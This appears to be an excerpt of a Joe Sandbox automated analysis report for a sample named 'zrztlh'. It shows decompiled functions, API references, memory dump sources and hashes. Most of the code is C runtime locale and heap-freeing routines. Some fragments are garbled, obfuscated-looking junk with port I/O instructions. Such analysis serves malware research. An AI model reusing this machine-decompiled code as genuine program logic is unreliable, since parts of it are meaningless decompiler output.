                  • Part of subcall function 00EB842D: _free.LIBCMT ref: 00EB8490
                  • Part of subcall function 00EB842D: _free.LIBCMT ref: 00EB84A2
                  • Part of subcall function 00EB842D: _free.LIBCMT ref: 00EB84B4
                  • Part of subcall function 00EB842D: _free.LIBCMT ref: 00EB84C6
                  • Part of subcall function 00EB842D: _free.LIBCMT ref: 00EB84D8
                  • Part of subcall function 00EB842D: _free.LIBCMT ref: 00EB84EA
                  • Part of subcall function 00EB842D: _free.LIBCMT ref: 00EB84FC
                  • Part of subcall function 00EB842D: _free.LIBCMT ref: 00EB850E
                  • Part of subcall function 00EB842D: _free.LIBCMT ref: 00EB8520
                Memory Dump Source
                • Source File: 00000002.00000002.532402262.0000000000EA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00EA0000, based on PE: true
                • Associated: 00000002.00000002.532394919.0000000000EA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                • Associated: 00000002.00000002.532428548.0000000000EC7000.00000002.00000001.01000000.00000004.sdmpDownload File
                • Associated: 00000002.00000002.532441093.0000000000ECE000.00000008.00000001.01000000.00000004.sdmpDownload File
                • Associated: 00000002.00000002.532448854.0000000000ED2000.00000002.00000001.01000000.00000004.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_ea0000_zrztlh.jbxd
                Similarity
                • API ID: _free$___getlocaleinfo$InfoLocale___crt__calloc_crt$ErrorLast$FreeHeap__invoke_watson
                • String ID:
                • API String ID: 3394113687-0
                • Opcode ID: d240112f6bff3548c84ae91326eacca9f9051ac118192e7e34800d04bc19bc67
                • Instruction ID: 4e27bb8dbb8a41178c9b287f7ee973b7f07c85956efb9cb5f382097c7850fe64
                • Opcode Fuzzy Hash: d240112f6bff3548c84ae91326eacca9f9051ac118192e7e34800d04bc19bc67
                • Instruction Fuzzy Hash: 0051F3B2D401087AEB20DBA8CC46FEB7BEC9B09B85F145510FB04FB1C2D5A0DA509A65
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00EA1110 Relevance: 13.6, APIs: 9, Instructions: 82COMMON
                Download Yara Rule
                C-Code - Quality: 97%
                			E00EA1110(void* __ecx, void* __edx, signed int __edi, void* __esi, void* __eflags) {
				intOrPtr _t39;
				intOrPtr _t40;
				intOrPtr _t41;
				intOrPtr _t42;
				intOrPtr _t43;
				signed int _t48;
				signed int _t52;
				void* _t72;
				signed int _t74;
				signed int _t79;
				signed int _t80;
				signed int _t94;
				intOrPtr* _t99;
				signed int _t101;
				signed int _t102;
				signed int _t103;
				signed int _t104;
				signed int _t105;
				void* _t106;

				_t95 = __edi;
				if(__eflags == 0) {
					_t99 =  *((intOrPtr*)(_t106 + 8));
					_t39 =  *0xecee28; // 0xecee24
					 *_t99 = _t39;
					_t40 =  *0xecee2c; // 0xed0054
					 *((intOrPtr*)(_t99 + 4)) = _t40;
					_t41 =  *0xecee30; // 0xed0054
					 *((intOrPtr*)(_t99 + 8)) = _t41;
					_t42 =  *0xecee58; // 0xecee78
					 *((intOrPtr*)(_t99 + 0x30)) = _t42;
					_t43 =  *0xecee5c; // 0xed0058
					 *((intOrPtr*)(_t99 + 0x34)) = _t43;
					goto L13;
				} else {
					_t52 = E00EB22C8(__ecx, __edx, 4);
					 *(_t106 - 0xc) = _t52;
					if(_t52 == 0) {
						L5:
						E00EB2248( *((intOrPtr*)(_t106 + 8)));
						E00EB2248( *(_t106 - 4));
						_t48 =  *(_t106 - 8);
					} else {
						 *_t52 = __edi;
						_t97 =  *0x00000160;
						_t101 = E00EB4CB1(0xb0,  *0x00000160, __esi, _t106 - 0x14, 1,  *0x00000160, 0xe,  *((intOrPtr*)(_t106 + 8)));
						_t102 = _t101 | E00EB4CB1(0xb0,  *0x00000160, _t101, _t106 - 0x14, 1, _t97, 0xf,  *((intOrPtr*)(_t106 + 8)) + 4);
						 *(_t106 - 8) =  *((intOrPtr*)(_t106 + 8)) + 8;
						_t103 = _t102 | E00EB4CB1(0xb0, _t97, _t102, _t106 - 0x14, 1, _t97, 0x10,  *((intOrPtr*)(_t106 + 8)) + 8);
						_t104 = _t103 | E00EB4CB1(0xb0, _t97, _t103, _t106 - 0x14, 2, _t97, 0xe,  *((intOrPtr*)(_t106 + 8)) + 0x30);
						if((E00EB4CB1(0xb0, _t97, _t104, _t106 - 0x14, 2, _t97, 0xf,  *((intOrPtr*)(_t106 + 8)) + 0x34) | _t104) == 0) {
							_t94 =  *( *(_t106 - 8));
							while(1) {
								__eflags =  *_t94;
								if( *_t94 == 0) {
									break;
								}
								_t72 =  *_t94;
								__eflags = _t72 - 0x30;
								if(_t72 < 0x30) {
									L22:
									__eflags = _t72 - 0x3b;
									if(_t72 != 0x3b) {
										goto L10;
									} else {
										_t105 = _t94;
										do {
											 *_t105 =  *(_t105 + 1);
											_t105 = _t105 + 1;
											__eflags =  *_t105;
										} while ( *_t105 != 0);
										continue;
									}
									L27:
								} else {
									__eflags = _t72 - 0x39;
									if(_t72 > 0x39) {
										goto L22;
									} else {
										_t74 = _t72 - 0x30;
										__eflags = _t74;
										 *_t94 = _t74;
										L10:
										_t94 = _t94 + 1;
										__eflags = _t94;
									}
								}
							}
							_t95 =  *(_t106 - 0xc);
							_t99 =  *((intOrPtr*)(_t106 + 8));
							L13:
							_t79 =  *(_t106 - 4);
							 *_t79 = 1;
							__eflags = _t95;
							if(_t95 != 0) {
								 *_t95 = 1;
							}
							_t80 = _t79 | 0xffffffff;
							__eflags =  *0x0000012C;
							if( *0x0000012C != 0) {
								asm("lock xadd [edx], eax");
							}
							__eflags =  *0x00000128;
							if( *0x00000128 != 0) {
								asm("lock xadd [eax], ecx");
								__eflags = _t80 == 1;
								if(_t80 == 1) {
									E00EB2248( *0x00000128);
									E00EB2248( *0x00000134);
								}
							}
							 *0x00000128 =  *(_t106 - 4);
							_t48 = 0;
							__eflags = 0;
							 *0x0000012C = _t95;
							 *((intOrPtr*)(0x134)) = _t99;
						} else {
							E00EB8902( *((intOrPtr*)(_t106 + 8)));
							 *(_t106 - 8) =  *(_t106 - 8) | 0xffffffff;
							goto L5;
						}
					}
				}
				return _t48;
				goto L27;
			}






















                0x00ea1110
                0x00eb89f1
                0x00eb8b40
                0x00eb8b43
                0x00eb8b48
                0x00eb8b4a
                0x00eb8b4f
                0x00eb8b52
                0x00eb8b57
                0x00eb8b5a
                0x00eb8b5f
                0x00eb8b62
                0x00eb8b67
                0x00000000
                0x00eb89f7
                0x00eb89f9
                0x00eb89fe
                0x00eb8a04
                0x00eb8a99
                0x00eb8a9c
                0x00eb8aa5
                0x00eb8aaa
                0x00eb8a0a
                0x00eb8a0d
                0x00eb8a12
                0x00eb8a26
                0x00eb8a3a
                0x00eb8a46
                0x00eb8a54
                0x00eb8a6e
                0x00eb8a8a
                0x00eb8ab4
                0x00eb8ac7
                0x00eb8ac7
                0x00eb8aca
                0x00000000
                0x00000000
                0x00eb8ab8
                0x00eb8aba
                0x00eb8abc
                0x00eb8b2b
                0x00eb8b2b
                0x00eb8b2d
                0x00000000
                0x00eb8b2f
                0x00eb8b2f
                0x00eb8b31
                0x00eb8b34
                0x00eb8b36
                0x00eb8b39
                0x00eb8b39
                0x00000000
                0x00eb8b3e
                0x00000000
                0x00eb8abe
                0x00eb8abe
                0x00eb8ac0
                0x00000000
                0x00eb8ac2
                0x00eb8ac2
                0x00eb8ac2
                0x00eb8ac4
                0x00eb8ac6
                0x00eb8ac6
                0x00eb8ac6
                0x00eb8ac6
                0x00eb8ac0
                0x00eb8abc
                0x00eb8acc
                0x00eb8acf
                0x00eb8ad2
                0x00eb8ad2
                0x00eb8ad8
                0x00eb8ada
                0x00eb8adc
                0x00eb8ade
                0x00eb8ade
                0x00eb8ae3
                0x00eb8ae6
                0x00eb8ae8
                0x00eb8aec
                0x00eb8aec
                0x00eb8af3
                0x00eb8af5
                0x00eb8af7
                0x00eb8afb
                0x00eb8afc
                0x00eb8b01
                0x00eb8b0c
                0x00eb8b12
                0x00eb8afc
                0x00eb8b16
                0x00eb8b19
                0x00eb8b19
                0x00eb8b1b
                0x00eb8b1e
                0x00eb8a8c
                0x00eb8a8f
                0x00eb8a94
                0x00000000
                0x00eb8a98
                0x00eb8a8a
                0x00eb8a04
                0x00eb8b2a
                0x00000000

                APIs
                • __malloc_crt.LIBCMT ref: 00EB89F9
                  • Part of subcall function 00EB22C8: _malloc.LIBCMT ref: 00EB22D9
                • ___getlocaleinfo.LIBCMT ref: 00EB8A1E
                  • Part of subcall function 00EB4CB1: ___crtGetLocaleInfoA.LIBCMT ref: 00EB4D03
                  • Part of subcall function 00EB4CB1: GetLastError.KERNEL32 ref: 00EB4D15
                  • Part of subcall function 00EB4CB1: ___crtGetLocaleInfoA.LIBCMT ref: 00EB4D35
                  • Part of subcall function 00EB4CB1: __calloc_crt.LIBCMT ref: 00EB4D4A
                  • Part of subcall function 00EB4CB1: ___crtGetLocaleInfoA.LIBCMT ref: 00EB4D77
                  • Part of subcall function 00EB4CB1: __calloc_crt.LIBCMT ref: 00EB4D8C
                  • Part of subcall function 00EB4CB1: _free.LIBCMT ref: 00EB4DA4
                • ___getlocaleinfo.LIBCMT ref: 00EB8A35
                  • Part of subcall function 00EB4CB1: _free.LIBCMT ref: 00EB4DE4
                  • Part of subcall function 00EB4CB1: __calloc_crt.LIBCMT ref: 00EB4E0E
                  • Part of subcall function 00EB4CB1: _free.LIBCMT ref: 00EB4E34
                  • Part of subcall function 00EB4CB1: __invoke_watson.LIBCMT ref: 00EB4E84
                • ___getlocaleinfo.LIBCMT ref: 00EB8A4F
                • ___getlocaleinfo.LIBCMT ref: 00EB8A66
                • ___getlocaleinfo.LIBCMT ref: 00EB8A80
                • ___free_lconv_num.LIBCMT ref: 00EB8A8F
                  • Part of subcall function 00EB8902: _free.LIBCMT ref: 00EB8918
                  • Part of subcall function 00EB8902: _free.LIBCMT ref: 00EB892A
                  • Part of subcall function 00EB8902: _free.LIBCMT ref: 00EB893C
                  • Part of subcall function 00EB8902: _free.LIBCMT ref: 00EB894E
                  • Part of subcall function 00EB8902: _free.LIBCMT ref: 00EB8960
                • _free.LIBCMT ref: 00EB8A9C
                • _free.LIBCMT ref: 00EB8AA5
                • _free.LIBCMT ref: 00EB8B01
                • _free.LIBCMT ref: 00EB8B0C
                Memory Dump Source
                • Source File: 00000002.00000002.532402262.0000000000EA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00EA0000, based on PE: true
                • Associated: 00000002.00000002.532394919.0000000000EA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                • Associated: 00000002.00000002.532428548.0000000000EC7000.00000002.00000001.01000000.00000004.sdmpDownload File
                • Associated: 00000002.00000002.532441093.0000000000ECE000.00000008.00000001.01000000.00000004.sdmpDownload File
                • Associated: 00000002.00000002.532448854.0000000000ED2000.00000002.00000001.01000000.00000004.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_ea0000_zrztlh.jbxd
                Similarity
                • API ID: _free$___getlocaleinfo$InfoLocale___crt__calloc_crt$ErrorLast___free_lconv_num__invoke_watson__malloc_crt_malloc
                • String ID:
                • API String ID: 3887541295-0
                • Opcode ID: 82b4644ae07c0169578ac2e24c51b9e489d15f234c44375145e1d30360a2be34
                • Instruction ID: 11caa2f6fd1e5339cd4bb9ab9288a885e28c1434a6e26600e77db89d58b9ee1e
                • Opcode Fuzzy Hash: 82b4644ae07c0169578ac2e24c51b9e489d15f234c44375145e1d30360a2be34
                • Instruction Fuzzy Hash: 822153B6940209BAEB20DBA4CC46FEFBBEC9B44750F145115FA04FA2D1DA70DA40CB61
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00EBE8C3 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 56COMMONLIBRARYCODE
                Download Yara Rule
                C-Code - Quality: 100%
                			E00EBE8C3(short _a4, intOrPtr _a8) {
				short _t13;
				short _t28;

				_t28 = _a4;
				if(_t28 != 0 &&  *_t28 != 0 && E00EBDB28(_t28, ?str?) != 0) {
					if(E00EBDB28(_t28, ?str?) != 0) {
						return E00EBEFC5(_t28);
					}
					if(GetLocaleInfoW( *(_a8 + 8), 0x2000000b,  &_a4, 2) == 0) {
						L9:
						return 0;
					}
					return _a4;
				}
				if(GetLocaleInfoW( *(_a8 + 8), 0x20001004,  &_a4, 2) == 0) {
					goto L9;
				}
				_t13 = _a4;
				if(_t13 == 0) {
					return GetACP();
				}
				return _t13;
			}





                0x00ebe8c7
                0x00ebe8cc
                0x00ebe8f4
                0x00000000
                0x00ebe91d
                0x00ebe90f
                0x00ebe93b
                0x00000000
                0x00ebe93b
                0x00000000
                0x00ebe911
                0x00ebe939
                0x00000000
                0x00000000
                0x00ebe93f
                0x00ebe944
                0x00ebe948
                0x00ebe948
                0x00ebe916

                APIs
                • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,?,?,00EBEB89,?,00000000), ref: 00EBE907
                • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,?,?,00EBEB89,?,00000000), ref: 00EBE931
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.532402262.0000000000EA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00EA0000, based on PE: true
                • Associated: 00000002.00000002.532394919.0000000000EA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                • Associated: 00000002.00000002.532428548.0000000000EC7000.00000002.00000001.01000000.00000004.sdmpDownload File
                • Associated: 00000002.00000002.532441093.0000000000ECE000.00000008.00000001.01000000.00000004.sdmpDownload File
                • Associated: 00000002.00000002.532448854.0000000000ED2000.00000002.00000001.01000000.00000004.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_ea0000_zrztlh.jbxd
                Similarity
                • API ID: InfoLocale
                • String ID: ACP$OCP
                • API String ID: 2299586839-711371036
                • Opcode ID: b4cb63a85889fdf2dfd0883e57899944b483b6d1a0fe0cde0f0eaeb73f6ba0ec
                • Instruction ID: bbd92ebf05956c3359fd9bc9f353d70a772304c51c54fc90144992672bc5ae30
                • Opcode Fuzzy Hash: b4cb63a85889fdf2dfd0883e57899944b483b6d1a0fe0cde0f0eaeb73f6ba0ec
                • Instruction Fuzzy Hash: D301B532208205BAEB509F15DC46FEB37DC9F44768F0054A5F909FA291E731EE85C791
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0040E454 Relevance: .0, Instructions: 25COMMON
                Download Yara Rule
                C-Code - Quality: 47%
                			E0040E454(void* __eax, void* __ebx, char __edx, void* __esi, void* __eflags, void* __fp0) {
				void* _t34;
				intOrPtr _t36;
				void* _t64;
				signed int _t73;
				void* _t74;
				void* _t84;

				_t34 = __eax;
				_push(es);
				asm("sbb al, 0x58");
				_push(0xa506a485);
				if(__eflags != 0) {
					L5:
					return _t34;
				} else {
					_t84 =  *((intOrPtr*)(__esi + 0x73)) - __ebx;
					_pop(_t70);
					if(_t84 >= 0) {
						asm("in al, dx");
						_t36 =  *((intOrPtr*)( *((intOrPtr*)(_t74 + 0xc)) + 8));
						_t64 = 0;
						__eflags = _t36 - 8;
						if(_t36 != 8) {
							__eflags = _t36 - 0xd;
							if(_t36 != 0xd) {
								__eflags = _t36 - 9;
								if(_t36 != 9) {
									__eflags = _t36 - 0x1b;
									if(_t36 != 0x1b) {
										__eflags = _t36 - 0x12;
										if(_t36 != 0x12) {
											__eflags = _t36 + 0xffffff90 - 0x17;
											if(_t36 + 0xffffff90 > 0x17) {
												goto L10;
											} else {
												return 1;
											}
										} else {
											_t73 =  *((intOrPtr*)(_t74 + 8));
											E0041BDB0(_t73 + 0x113e0, _t73 + 0x12078, 0xc);
											 *(_t73 + 0x112b8) = 5;
											goto L9;
										}
									} else {
										_t73 =  *((intOrPtr*)(_t74 + 8));
										E0041BDB0(_t73 + 0x113e0, _t73 + 0x12060, 0xc);
										 *(_t73 + 0x112b8) = 5;
										goto L9;
									}
								} else {
									_t73 =  *((intOrPtr*)(_t74 + 8));
									E0041BDB0(_t73 + 0x113e0, _t73 + 0x12090, 0xc);
									 *(_t73 + 0x112b8) = 5;
									goto L9;
								}
							} else {
								_t73 =  *((intOrPtr*)(_t74 + 8));
								_push(0x10);
								_push(_t73 + 0x120a8);
								_push(_t73 + 0x113e0);
								goto L8;
							}
						} else {
							_t73 =  *((intOrPtr*)(_t74 + 8));
							_push(0x10);
							_push(_t73 + 0x120c0);
							_push(_t73 + 0x113e0);
							L8:
							E0041BDB0();
							 *(_t73 + 0x112b8) = 7;
							L9:
							_t64 = 1;
							E0041BDB0(_t73 + 0x113e0 +  *(_t73 + 0x112b8) * 2, _t73 + 0x112d8, 4);
							_t17 = _t73 + 0x112b8;
							 *_t17 =  *(_t73 + 0x112b8) + 2;
							__eflags =  *_t17;
							E0040DE70(_t73, 2);
							L10:
							return _t64;
						}
					} else {
						asm("aaa");
						_push(cs);
						asm("cdq");
						 *((char*)(__eax - 0x6f)) = __edx;
						_push(0xf8b71909);
						goto 0xe3f7;
						asm("cmpsd");
						asm("cmpsb");
						goto L5;
					}
				}
			}









                0x0040e454
                0x0040e454
                0x0040e455
                0x0040e457
                0x0040e45c
                0x0040e48a
                0x0040e490
                0x0040e45e
                0x0040e45e
                0x0040e45f
                0x0040e460
                0x0040e4a2
                0x0040e4a6
                0x0040e4ab
                0x0040e4ad
                0x0040e4b0
                0x0040e510
                0x0040e513
                0x0040e52a
                0x0040e52d
                0x0040e553
                0x0040e556
                0x0040e57f
                0x0040e582
                0x0040e5ae
                0x0040e5b1
                0x00000000
                0x0040e5b7
                0x0040e5bf
                0x0040e5bf
                0x0040e584
                0x0040e584
                0x0040e597
                0x0040e59c
                0x00000000
                0x0040e59c
                0x0040e558
                0x0040e558
                0x0040e56b
                0x0040e570
                0x00000000
                0x0040e570
                0x0040e52f
                0x0040e52f
                0x0040e542
                0x0040e547
                0x00000000
                0x0040e547
                0x0040e515
                0x0040e515
                0x0040e518
                0x0040e520
                0x0040e527
                0x00000000
                0x0040e527
                0x0040e4b2
                0x0040e4b2
                0x0040e4b5
                0x0040e4bd
                0x0040e4c4
                0x0040e4c5
                0x0040e4c5
                0x0040e4ca
                0x0040e4d4
                0x0040e4ee
                0x0040e4f3
                0x0040e4f8
                0x0040e4f8
                0x0040e4f8
                0x0040e502
                0x0040e50a
                0x0040e50f
                0x0040e50f
                0x0040e465
                0x0040e466
                0x0040e467
                0x0040e468
                0x0040e469
                0x0040e46c
                0x0040e478
                0x0040e47f
                0x0040e480
                0x00000000
                0x0040e481
                0x0040e460

                Memory Dump Source
                • Source File: 00000002.00000002.532198194.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_zrztlh.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 0aa2d2a0d50eeb7ad0d81364a6ebbf11094aebd8940885d66045e382b4182d9f
                • Instruction ID: 8156391e62aa7a67c88d3b19a6d33367a88bdcb5fd30e7aa248455c16bac01a2
                • Opcode Fuzzy Hash: 0aa2d2a0d50eeb7ad0d81364a6ebbf11094aebd8940885d66045e382b4182d9f
                • Instruction Fuzzy Hash: 3BD02B31A46615C9C2211D59BD044FEF77CDAD3222F181DBFDBD9631118230C047865B
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00417D7E Relevance: .0, Instructions: 14COMMON
                Download Yara Rule
                C-Code - Quality: 68%
                			E00417D7E(signed int __eax, void* __ebx, void* __edi) {
				void* _t12;

				asm("in al, 0x80");
				 *((intOrPtr*)(_t12 - 0x2a)) =  *((intOrPtr*)(_t12 - 0x2a)) - __ebx;
				 *((intOrPtr*)(__edi - 0x1295096)) =  *((intOrPtr*)(__edi - 0x1295096)) - _t12;
				return __eax & 0xbbea5bfd;
			}




                0x00417d83
                0x00417d85
                0x00417d88
                0x00417d99

                Memory Dump Source
                • Source File: 00000002.00000002.532198194.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_zrztlh.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 75102d1129a281efdef18defaaae80107a2ca018b51d7b82ddf8910475f852d3
                • Instruction ID: e4025118671ec2202aa14b87c42a559416c62acf3e4200dbe05eca2f0dfd4566
                • Opcode Fuzzy Hash: 75102d1129a281efdef18defaaae80107a2ca018b51d7b82ddf8910475f852d3
                • Instruction Fuzzy Hash: 02C08033F0501C4586104CE5F4020F4F374D547192B04135FC94CB30405113D010465D
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0040E481 Relevance: .0, Instructions: 11COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E0040E481(void* __eax) {

				return __eax;
			}



                0x0040e490

                Memory Dump Source
                • Source File: 00000002.00000002.532198194.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_zrztlh.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 1a9dd0381e71d8b4deb29e717aa7fe92093c1ad123f34a163d14a788ae9f0aa2
                • Instruction ID: 2125dbffa09ef3ab1ceb430a1d31913b87f5203aed1fd3037384c02c8bde55cb
                • Opcode Fuzzy Hash: 1a9dd0381e71d8b4deb29e717aa7fe92093c1ad123f34a163d14a788ae9f0aa2
                • Instruction Fuzzy Hash: 29A00117F8A1181254285C8E78820B4F378D687076E5032E7DE0CB79402452CC6641EE
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00EA4917 Relevance: 40.6, APIs: 27, Instructions: 67COMMON
                Download Yara Rule
                C-Code - Quality: 95%
                			E00EA4917(void* __eax, void* __ebx, void* __ecx, void* __edx, void* __esi) {
				void* _t60;
				void* _t65;

				_t65 = __esi;
				asm("in eax, dx");
				asm("sbb al, 0x1");
				 *((intOrPtr*)(__ecx + 0x11234e3)) =  *((intOrPtr*)(__ecx + 0x11234e3)) + __eax;
				 *((intOrPtr*)(__ecx + 0x16c96f3)) =  *((intOrPtr*)(__ecx + 0x16c96f3)) + __eax;
				_t6 = _t65 + 0xf8; // 0x55c35d59
				E00EB2248( *_t6);
				_t7 = _t65 + 0xfc; // 0x5768ec8b
				E00EB2248( *_t7);
				_t8 = _t65 + 0x100; // 0xff000001
				E00EB2248( *_t8);
				_t9 = _t65 + 0x104; // 0x43e80875
				E00EB2248( *_t9);
				_t10 = _t65 + 0x108; // 0x59000003
				E00EB2248( *_t10);
				_t11 = _t65 + 0x10c; // 0x55c35d59
				E00EB2248( *_t11);
				_t12 = _t65 + 0x110; // 0x106aec8b
				E00EB2248( *_t12);
				_t13 = _t65 + 0x114; // 0xe80875ff
				E00EB2248( *_t13);
				_t14 = _t65 + 0x118; // 0x332
				E00EB2248( *_t14);
				_t15 = _t65 + 0x11c; // 0xc35d5959
				E00EB2248( *_t15);
				_t16 = _t65 + 0x120; // 0x6aec8b55
				E00EB2248( *_t16);
				_t17 = _t65 + 0x124; // 0x875ff08
				E00EB2248( *_t17);
				_t18 = _t65 + 0x128; // 0x321e8
				E00EB2248( *_t18);
				_t19 = _t65 + 0x12c; // 0x5d595900
				E00EB2248( *_t19);
				_t20 = _t65 + 0x130; // 0xec8b55c3
				E00EB2248( *_t20);
				_t21 = _t65 + 0x134; // 0x75ff016a
				E00EB2248( *_t21);
				_t22 = _t65 + 0x138; // 0x310e808
				E00EB2248( *_t22);
				_t23 = _t65 + 0x13c; // 0x59590000
				E00EB2248( *_t23);
				_t24 = _t65 + 0x140; // 0x8b55c35d
				E00EB2248( *_t24);
				_t25 = _t65 + 0x144; // 0x8068ec
				E00EB2248( *_t25);
				_t26 = _t65 + 0x148; // 0x75ff0000
				E00EB2248( *_t26);
				_t27 = _t65 + 0x14c; // 0x2fce808
				E00EB2248( *_t27);
				_t28 = _t65 + 0x150; // 0x59590000
				E00EB2248( *_t28);
				_t29 = _t65 + 0x154; // 0x8b55c35d
				E00EB2248( *_t29);
				_t30 = _t65 + 0x158; // 0xff006aec
				E00EB2248( *_t30);
				_t31 = _t65 + 0x15c; // 0x8ce80875
				E00EB2248( *_t31);
				_t32 = _t65 + 0x160; // 0x59fffffe
				_t60 = E00EB2248( *_t32);
				return _t60;
			}





                0x00ea4917
                0x00ea4917
                0x00ea4918
                0x00ea491a
                0x00ea4920
                0x00eb8df2
                0x00eb8df8
                0x00eb8dfd
                0x00eb8e03
                0x00eb8e08
                0x00eb8e0e
                0x00eb8e13
                0x00eb8e19
                0x00eb8e21
                0x00eb8e27
                0x00eb8e2c
                0x00eb8e32
                0x00eb8e37
                0x00eb8e3d
                0x00eb8e42
                0x00eb8e48
                0x00eb8e4d
                0x00eb8e53
                0x00eb8e58
                0x00eb8e5e
                0x00eb8e63
                0x00eb8e69
                0x00eb8e6e
                0x00eb8e74
                0x00eb8e79
                0x00eb8e7f
                0x00eb8e84
                0x00eb8e8a
                0x00eb8e8f
                0x00eb8e95
                0x00eb8e9a
                0x00eb8ea0
                0x00eb8ea5
                0x00eb8eab
                0x00eb8eb0
                0x00eb8eb6
                0x00eb8ebb
                0x00eb8ec1
                0x00eb8ec6
                0x00eb8ecc
                0x00eb8ed4
                0x00eb8eda
                0x00eb8edf
                0x00eb8ee5
                0x00eb8eea
                0x00eb8ef0
                0x00eb8ef5
                0x00eb8efb
                0x00eb8f00
                0x00eb8f06
                0x00eb8f0b
                0x00eb8f11
                0x00eb8f16
                0x00eb8f1c
                0x00eb8f26

                APIs
                Memory Dump Source
                • Source File: 00000002.00000002.532402262.0000000000EA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00EA0000, based on PE: true
                • Associated: 00000002.00000002.532394919.0000000000EA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                • Associated: 00000002.00000002.532428548.0000000000EC7000.00000002.00000001.01000000.00000004.sdmpDownload File
                • Associated: 00000002.00000002.532441093.0000000000ECE000.00000008.00000001.01000000.00000004.sdmpDownload File
                • Associated: 00000002.00000002.532448854.0000000000ED2000.00000002.00000001.01000000.00000004.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_ea0000_zrztlh.jbxd
                Similarity
                • API ID: _free$ErrorFreeHeapLast
                • String ID:
                • API String ID: 776569668-0
                • Opcode ID: 034a6473bbb3b2f040111bce762662fb3b0b83b001bc7e0b41a8a63d6e83d995
                • Instruction ID: c76c982d28fe3763c6dea60a184c129c29c08e1021c71fff5aab45d07e48d500
                • Opcode Fuzzy Hash: 034a6473bbb3b2f040111bce762662fb3b0b83b001bc7e0b41a8a63d6e83d995
                • Instruction Fuzzy Hash: 50211F71860601DBCB523B30DD036D77BE1AF25305F145E6DF3FEB41729A223965A642
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00EB842D Relevance: 19.6, APIs: 13, Instructions: 87COMMONLIBRARYCODE
                Download Yara Rule
                C-Code - Quality: 100%
                			E00EB842D(intOrPtr _a4) {
				intOrPtr _t15;
				intOrPtr _t54;
				void* _t56;
				void* _t57;
				void* _t58;
				void* _t59;
				void* _t60;
				void* _t61;
				void* _t62;
				void* _t63;
				void* _t64;
				void* _t65;
				void* _t66;
				void* _t67;
				void* _t68;

				_t54 = _a4;
				if(_t54 != 0) {
					_t2 = _t54 + 0xc; // 0xf000000
					_t56 =  *_t2 -  *0xecee34; // 0xed0054
					if(_t56 != 0) {
						E00EB2248(_t16);
					}
					_t3 = _t54 + 0x10; // 0x254804b7
					_t57 =  *_t3 -  *0xecee38; // 0xed0054
					if(_t57 != 0) {
						E00EB2248(_t17);
					}
					_t4 = _t54 + 0x14; // 0x8000
					_t58 =  *_t4 -  *0xecee3c; // 0xed0054
					if(_t58 != 0) {
						E00EB2248(_t18);
					}
					_t5 = _t54 + 0x18; // 0xfc7d80
					_t59 =  *_t5 -  *0xecee40; // 0xed0054
					if(_t59 != 0) {
						E00EB2248(_t19);
					}
					_t6 = _t54 + 0x1c; // 0x4d8b0774
					_t60 =  *_t6 -  *0xecee44; // 0xed0054
					if(_t60 != 0) {
						E00EB2248(_t20);
					}
					_t7 = _t54 + 0x20; // 0x706183f8
					_t61 =  *_t7 -  *0xecee48; // 0xed0054
					if(_t61 != 0) {
						E00EB2248(_t21);
					}
					_t8 = _t54 + 0x24; // 0x5de58bfd
					_t62 =  *_t8 -  *0xecee4c; // 0xed0054
					if(_t62 != 0) {
						E00EB2248(_t22);
					}
					_t9 = _t54 + 0x38; // 0x5d595900
					_t63 =  *_t9 -  *0xecee60; // 0xed0058
					if(_t63 != 0) {
						E00EB2248(_t23);
					}
					_t10 = _t54 + 0x3c; // 0xec8b55c3
					_t64 =  *_t10 -  *0xecee64; // 0xed0058
					if(_t64 != 0) {
						E00EB2248(_t24);
					}
					_t11 = _t54 + 0x40; // 0x10368
					_t65 =  *_t11 -  *0xecee68; // 0xed0058
					if(_t65 != 0) {
						E00EB2248(_t25);
					}
					_t12 = _t54 + 0x44; // 0x875ff00
					_t66 =  *_t12 -  *0xecee6c; // 0xed0058
					if(_t66 != 0) {
						E00EB2248(_t26);
					}
					_t13 = _t54 + 0x48; // 0x401e8
					_t67 =  *_t13 -  *0xecee70; // 0xed0058
					if(_t67 != 0) {
						E00EB2248(_t27);
					}
					_t14 = _t54 + 0x4c; // 0x5d595900
					_t15 =  *_t14;
					_t68 = _t15 -  *0xecee74; // 0xed0058
					if(_t68 != 0) {
						return E00EB2248(_t15);
					}
				}
				return _t15;
			}


















                0x00eb8431
                0x00eb8436
                0x00eb843c
                0x00eb843f
                0x00eb8445
                0x00eb8448
                0x00eb844d
                0x00eb844e
                0x00eb8451
                0x00eb8457
